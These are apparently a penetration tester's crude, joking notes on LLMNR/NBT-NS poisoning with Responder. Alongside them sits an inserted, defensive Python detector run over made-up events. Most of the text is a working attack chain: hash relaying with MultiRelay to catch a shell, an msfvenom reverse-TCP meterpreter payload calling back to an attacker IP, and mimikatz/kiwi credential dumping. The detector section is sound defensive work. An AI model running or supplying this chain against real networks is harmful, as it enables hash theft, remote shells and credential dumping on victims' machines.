Responder
--LLMNR, NBT-NS and MDNS poisoning Attack Tool--
//Needs SMB signing off on the target to work. Check with:
#python RunFinger.py -i <target ip>
How the attack works:
1) Host A makes a DNS request for an SMB system that does not exist in the network.
2) Since the internal DNS cannot resolve it, an LLMNR/NBT-NS broadcast goes out looking for this unknown system across the LAN.
3) And what do we do bois? We respond from our box on the net, saying "that's me fucko".
4) And the little bish responds with its NTLMv1/v2 hash like a sucka.
5) tis tis crack it! bist bist pass it! tis tis bop it!
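The same sequence seen from the blue side: steps 1-4 mean any host that answers fallback LLMNR/NBT-NS queries for names it does not own (or for names that do not exist at all) is poisoning. This added Python example is not part of the original notes; it runs a simple detector over constructed name-resolution events (the IPs, names and the `KNOWN_HOSTS` table are made up), the kind of data a resolver-monitoring sensor would log.

```python
"""Flag LLMNR/NBT-NS poisoners from name-resolution answer events.

A poisoner answers queries for names that internal DNS could not resolve,
so it either impersonates a real host or answers many bogus names. The
events below are constructed sample data, not a real capture.
"""
from collections import defaultdict

# Constructed sample events: (protocol, queried name, IP that answered).
EVENTS = [
    ("LLMNR",  "fileserver01",  "10.0.0.15"),   # real owner answering
    ("LLMNR",  "wpad",          "10.0.0.99"),   # no such host in DNS
    ("NBT-NS", "FILESRV-TYPO",  "10.0.0.99"),   # a mistyped name
    ("LLMNR",  "printer-acct",  "10.0.0.99"),   # another bogus name
    ("LLMNR",  "fileserver01",  "10.0.0.99"),   # impersonating a known host
    ("LLMNR",  "fileserver01",  "10.0.0.15"),
]

# Constructed inventory: names that legitimately exist and who owns them.
KNOWN_HOSTS = {"fileserver01": "10.0.0.15"}


def find_poisoners(events, known_hosts, min_names=2):
    """Return {ip: sorted names} for hosts that answered a fallback query
    for a name they do not own, or for at least `min_names` distinct names
    that are not in the inventory (a poisoner answers everything it hears).
    """
    answered = defaultdict(set)   # ip -> names it answered without owning
    flagged = defaultdict(set)    # ip -> names that justify an alert
    for _proto, name, ip in events:
        lname = name.lower()      # LLMNR and NBT-NS names are case-insensitive
        if known_hosts.get(lname) == ip:
            continue              # the real owner replied: expected behaviour
        answered[ip].add(lname)
        if lname in known_hosts:
            flagged[ip].add(lname)  # someone else claims a real host's name
    for ip, names in answered.items():
        unknown = {n for n in names if n not in known_hosts}
        if len(unknown) >= min_names:
            flagged[ip] |= unknown  # answering many nonexistent names
    return {ip: sorted(names) for ip, names in flagged.items()}


if __name__ == "__main__":
    for ip, names in find_poisoners(EVENTS, KNOWN_HOSTS).items():
        print(f"possible LLMNR/NBT-NS poisoner {ip}: answered {', '.join(names)}")
```

Alerts from this only confirm the abuse; the settings the notes rely on (SMB signing off, LLMNR and NBT-NS enabled) are what actually have to change.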
To exploit:
https://book.hacktricks.xyz/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks
------POC---------
//Find vuln hosts
python RunFinger.py -i <cidr>
//Turn off SMB and HTTP servers
#vi /usr/share/responder/Responder.conf
//start Responder on the correct interface and also try to downgrade to LM if we can
#./Responder.py -I tap0 --lm //watch for hosts, then start MultiRelay and leave Responder running.
//Will then pass the hash when we get it from responder
#MultiRelay.py -t 172.16.23.101 -u ALL //target taken from Responder, wait for MultiRelay to catch a shell
//Make a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -f exe > /root/data/payload.exe
//Start handler
msf> use exploit/multi/handler
msf> set payload windows/x64/meterpreter/reverse_tcp //this has to match whatever we used for msfvenom
//set your lport and lhost
msf>run
//go back to the shell we caught in MultiRelay and upload the payload
#upload /root/data/payload.exe
//execute payload
#C:\windows\temp\payload.exe
//we should now see the meterpreter shell being caught
//we can now do some dumping
meterpreter> load kiwi //loads the kiwi (mimikatz) meterpreter extension
meterpreter> help
meterpreter> creds_all //dump creds